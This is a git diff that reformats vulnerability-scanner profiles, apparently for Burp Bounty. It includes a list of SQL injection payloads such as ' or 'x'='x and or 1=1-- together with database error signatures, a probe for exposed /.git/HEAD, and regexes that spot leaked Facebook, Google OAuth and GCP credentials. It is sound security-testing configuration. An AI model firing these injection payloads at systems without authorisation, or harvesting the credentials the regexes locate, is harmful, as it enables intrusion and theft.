-[{"Name":"ErrorPages-JobApps","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["syd_apply.cfm"],"Tags":["Errors"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"ErrorPages-JobApps","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Find error pages for job applications, sometimes can contain juicy information:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5033/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "ErrorPages-JobApps", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Value,syd_apply.cfm" + ], + "Tags": [ + "Errors", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "ErrorPages-JobApps", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Find error pages for job applications, sometimes can contain juicy information:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5033/", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/ErrorSQLi.bb b/profiles/ErrorSQLi.bb index 9208199..b655914 100755 --- a/profiles/ErrorSQLi.bb +++ b/profiles/ErrorSQLi.bb @@ -1 +1,147 @@ -[{"Name":"ErrorSQLi","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u0027-\u0027","\u0027 \u0027","\u0027\u0026\u0027","\u0027^\u0027","\u0027*\u0027","\u0027 or \u0027\u0027-\u0027","\u0027 or \u0027\u0027 \u0027","\u0027 or \u0027\u0027\u0026\u0027","\u0027 or \u0027\u0027^\u0027","\u0027 or \u0027\u0027*\u0027","\"-\"","\" \"","\"\u0026\"","\"^\"","\"*\"","\" or \"\"-\"","\" or \"\" \"","\" or \"\"\u0026\"","\" or \"\"^\"","\" or \"\"*\"","or true--","\" or true--","\u0027 or true--","\") or true--","\u0027) or true--","\u0027 or \u0027x\u0027\u003d\u0027x","\u0027) or (\u0027x\u0027)\u003d(\u0027x","\u0027)) or ((\u0027x\u0027))\u003d((\u0027x","\" or \"x\"\u003d\"x","\") or (\"x\")\u003d(\"x","\")) or ((\"x\"))\u003d((\"x","or 1\u003d1","or 1\u003d1-- ","or 1\u003d1#","or 1\u003d1/*"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,Microsoft OLE DB Provider for ODBC Drivers error","true,Or,You have an error in your SQL syntax","true,Or,ORA-00933: SQL command not properly ended","true,Or,Microsoft SQL Native Client error","true,Or,Query failed: ERROR: syntax error at or near","true,Or,You have an error in your SQL syntax","true,Or,MySQL Error: 1064\" \u0026 \"Session halted","true,Or,mysql error with query","true,Or,sQL syntax error","true,Or,PostgreSQL query failed: ERROR: parser: parse error","true,Or,Warning: mysql_fetch_array","true,Or,Warning: mysql_num_rows","true,Or,Warning: mysql_query","true,Or,Warning: mysql_fetch_assoc","true,Or,Warning: mysql_result","true,Or,Warning: mysql_free_result"],"Tags":["SQLi","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"ErrorSQLi","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Error SQLi with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "ErrorSQLi", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,\u0027-\u0027", + "true,\u0027 \u0027", + "true,\u0027\u0026\u0027", + "true,\u0027^\u0027", + "true,\u0027*\u0027", + "true,\u0027 or \u0027\u0027-\u0027", + "true,\u0027 or \u0027\u0027 \u0027", + "true,\u0027 or \u0027\u0027\u0026\u0027", + "true,\u0027 or \u0027\u0027^\u0027", + "true,\u0027 or \u0027\u0027*\u0027", + "true,\"-\"", + "true,\" \"", + "true,\"\u0026\"", + "true,\"^\"", + "true,\"*\"", + "true,\" or \"\"-\"", + "true,\" or \"\" \"", + "true,\" or \"\"\u0026\"", + "true,\" or \"\"^\"", + "true,\" or \"\"*\"", + "true,or true--", + "true,\" or true--", + "true,\u0027 or true--", + "true,\") or true--", + "true,\u0027) or true--", + "true,\u0027 or \u0027x\u0027\u003d\u0027x", + "true,\u0027) or (\u0027x\u0027)\u003d(\u0027x", + "true,\u0027)) or ((\u0027x\u0027))\u003d((\u0027x", + "true,\" or \"x\"\u003d\"x", + "true,\") or (\"x\")\u003d(\"x", + "true,\")) or ((\"x\"))\u003d((\"x", + "true,or 1\u003d1", + "true,or 1\u003d1-- ", + "true,or 1\u003d1#", + "true,or 1\u003d1/*" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Microsoft OLE DB Provider for ODBC Drivers error", + "true,Or,You have an error in your SQL syntax", + "true,Or,ORA-00933: SQL command not properly ended", + "true,Or,Microsoft SQL Native Client error", + "true,Or,Query failed: ERROR: syntax error at or near", + "true,Or,You have an error in your SQL syntax", + "true,Or,MySQL Error: 1064\" \u0026 \"Session halted", + "true,Or,mysql error with query", + "true,Or,sQL syntax error", + "true,Or,PostgreSQL query failed: ERROR: parser: parse error", + "true,Or,Warning: mysql_fetch_array", + "true,Or,Warning: mysql_num_rows", + "true,Or,Warning: mysql_query", + "true,Or,Warning: mysql_fetch_assoc", + "true,Or,Warning: mysql_result", + "true,Or,Warning: mysql_free_result" + ], + "Tags": [ + "SQLi", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 5, + "payloadPosition": 2, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "ErrorSQLi", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "Error SQLi with payloads: \u003cbr\u003e \u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Facebook_Client_ID.bb b/profiles/Facebook_Client_ID.bb old mode 100644 new mode 100755 index b2f527c..614008b --- a/profiles/Facebook_Client_ID.bb +++ b/profiles/Facebook_Client_ID.bb @@ -1 +1,59 @@ -[{"Name":"Facebook_Client_ID","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)(facebook|fb)(.{0,20})?[\u0027\\\"][0-9]{13,17}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Facebook client ID","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Facebook_Client_ID", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?i)(facebook|fb)(.{0,20})?[\u0027\\\"][0-9]{13,17}" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Facebook client ID", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Facebook_OAuth.bb b/profiles/Facebook_OAuth.bb old mode 100644 new mode 100755 index 7112b81..1e20449 --- a/profiles/Facebook_OAuth.bb +++ b/profiles/Facebook_OAuth.bb @@ -1 +1,59 @@ -[{"Name":"Facebook_OAuth","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\u0027|\\\"][0-9a-f]{32}[\u0027|\\\"]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Facebook OAuth","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Facebook_OAuth", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\u0027|\\\"][0-9a-f]{32}[\u0027|\\\"]" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Facebook OAuth", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/GCP_Service_Account.bb b/profiles/GCP_Service_Account.bb old mode 100644 new mode 100755 index 72b087b..6e3a9f2 --- a/profiles/GCP_Service_Account.bb +++ b/profiles/GCP_Service_Account.bb @@ -1 +1,60 @@ -[{"Name":"GCP_Service_Account","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,\\\"type\\\": \\\"service_account\\\""],"Tags":["Cloud","All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"GCP Service Account","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "GCP_Service_Account", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,\\\"type\\\": \\\"service_account\\\"" + ], + "Tags": [ + "Cloud", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "GCP Service Account", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/GCP_Urls.bb b/profiles/GCP_Urls.bb old mode 100644 new mode 100755 index 134a2d7..587328d --- a/profiles/GCP_Urls.bb +++ b/profiles/GCP_Urls.bb @@ -1 +1,61 @@ -[{"Name":"GCP_Urls","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,.corp.google.com","true,Or,.c.googlers.com"],"Tags":["Cloud","All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"GCP Urls found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "GCP_Urls", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,.corp.google.com", + "true,Or,.c.googlers.com" + ], + "Tags": [ + "Cloud", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "GCP Urls found", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/GitFinder.bb b/profiles/GitFinder.bb index f325c57..94cec17 100755 --- a/profiles/GitFinder.bb +++ b/profiles/GitFinder.bb @@ -1 +1,63 @@ -[{"Name":"GitFinder","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/.git/HEAD"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,refs"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"GitFinder","IssueSeverity":"Low","IssueConfidence":"Firm","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "GitFinder", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,/.git/HEAD" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,refs" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 5, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "GitFinder", + "IssueSeverity": "Low", + "IssueConfidence": "Firm", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 65 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Gmail_Oauth_2.0.bb b/profiles/Gmail_Oauth_2.0.bb old mode 100644 new mode 100755 index fecbcdb..e2e23ea --- a/profiles/Gmail_Oauth_2.0.bb +++ b/profiles/Gmail_Oauth_2.0.bb @@ -1 +1,59 @@ -[{"Name":"Gmail_Oauth_2.0","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Gmail Oauth 2.0","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Gmail_Oauth_2.0", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Gmail Oauth 2.0", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Google_Cloud_Buckets.bb b/profiles/Google_Cloud_Buckets.bb old mode 100644 new mode 100755 index fd29c35..914dc7c --- a/profiles/Google_Cloud_Buckets.bb +++ b/profiles/Google_Cloud_Buckets.bb @@ -1 +1,59 @@ -[{"Name":"Google_Cloud_Buckets","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(\\.storage\\.googleapis\\.com)|(\\.storage\\.cloud\\.googleapis\\.com)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Google Cloud Buckets","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Google_Cloud_Buckets", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(\\.storage\\.googleapis\\.com)|(\\.storage\\.cloud\\.googleapis\\.com)" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Google Cloud Buckets", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Google_Cloud_Platform_OAuth_2.0.bb b/profiles/Google_Cloud_Platform_OAuth_2.0.bb old mode 100644 new mode 100755 index a30a5f2..02722d2 --- a/profiles/Google_Cloud_Platform_OAuth_2.0.bb +++ b/profiles/Google_Cloud_Platform_OAuth_2.0.bb @@ -1 +1,60 @@ -[{"Name":"Google_Cloud_Platform_OAuth_2.0","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})","true,Or,[^a-zA-Z0-9]([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Google Cloud Platform OAuth 2.0","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Google_Cloud_Platform_OAuth_2.0", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,^([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})", + "true,Or,[^a-zA-Z0-9]([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + 